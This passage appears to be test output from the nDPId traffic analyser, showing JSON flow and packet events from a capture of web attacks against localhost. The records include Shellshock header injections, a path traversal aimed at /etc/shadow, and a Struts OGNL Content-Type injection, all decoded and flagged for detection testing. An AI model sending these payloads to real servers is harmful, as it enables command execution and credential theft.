{"hostname":"127.0.0.1","url":"127.0.0.1\/test.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1576420277463,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277463,"pkt":"AAAAAAAAAAAAAAAACABFAAEILLBAAEAGDz5\/AAABfwAAAcV0H5AN6xR8l7l+o4AYAED+\/AAAAQEICp1m\/f+dZv3+R0VUIC90ZXN0LnNoIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1576420277464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277464,"pkt":"AAAAAAAAAAAAAAAACABFAAEOUvlAAEAG6O5\/AAABfwAAAcV2H5BXVWoitNrsWoAYAED\/AgAAAQEICp1m\/gCdZv4AR0VUIC90bVVuYmxvY2suY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01169{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tmUnblock.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1576420277465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277465,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgUVAAEAGuqZ\/AAABfwAAAcV4H5AZ0bmWzQ36cYAYAED+\/gAAAQEICp1m\/gGdZv4BR0VUIC91bmFtZS5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uname.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1576420277466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277466,"pkt":"AAAAAAAAAAAAAAAACABFAAEM2vpAAEAGYO9\/AAABfwAAAcV6H5AtBOIv4uMLlYAYAED\/AAAAAQEICp1m\/gKdZv4CR0VUIC92aWV3Y3ZzLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} +01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewcvs.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1576420277467,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277467,"pkt":"AAAAAAAAAAAAAAAACABFAAEITytAAEAG7MJ\/AAABfwAAAcV8H5BFlnf\/97sS7IAYAED+\/AAAAQEICp1m\/gOdZv4DR0VUIC93ZWxjb21lIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/welcome","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1576420277469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277469,"pkt":"AAAAAAAAAAAAAAAACABFAAEK4AFAAEAGW+p\/AAABfwAAAcV+H5B29+cpQb7It4AYAED+\/gAAAQEICp1m\/gWdZv4FR0VUIC93aG9pcy5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/whois.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1576420277471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277471,"pkt":"AAAAAAAAAAAAAAAACABFAAEB0rpAAEAGaTp\/AAABfwAAAcWAH5AE8+pw+\/3ZB4AYAED+9QAAAQEICp1m\/gedZv4HR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1576420277473,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277473,"pkt":"AAAAAAAAAAAAAAAACABFAADnqaNAAEAGkmt\/AAABfwAAAcWCH5DlqJF6VmPeaYAYAED+2wAAAQEICp1m\/gmdZv4JR0VUIC8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvc2hhZG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpkaXNod2FzaGVyKQ0KDQo="} +01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:dishwasher)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1576420277474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"thread_ts_msec":1576420277474,"pkt":"AAAAAAAAAAAAAAAACABFAAFN5cZAAEAGVeJ\/AAABfwAAAcWEH5A2eN0dBhBSM4AYAED\/QQAAAQEICp1m\/gqdZv4KR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiAleyNjb250ZXh0Wydjb20ub3BlbnN5bXBob255Lnh3b3JrMi5kaXNwYXRjaGVyLkh0dHBTZXJ2bGV0UmVzcG9uc2UnXS5hZGRIZWFkZXIoJ05pa3RvLUFkZGVkLUNWRS0yMDE3LTU2MzgnLDcqNil9Lm11bHRpcGFydC9mb3JtLWRhdGENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzdHJ1dHNob2NrKQ0KDQo="} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1576420277477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277477,"pkt":"AAAAAAAAAAAAAAAACABFAAFZtP1AAEAGhp9\/AAABfwAAAcWGH5CUg4wjlAViUYAYAED\/TQAAAQEICp1m\/g2dZv4NR0VUIC9pbmRleC5hY3Rpb24gSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogJXsjY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuZGlzcGF0Y2hlci5IdHRwU2VydmxldFJlc3BvbnNlJ10uYWRkSGVhZGVyKCdOaWt0by1BZGRlZC1DVkUtMjAxNy01NjM4Jyw3KjYpfS5tdWx0aXBhcnQvZm9ybS1kYXRhDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c3RydXRzaG9jaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 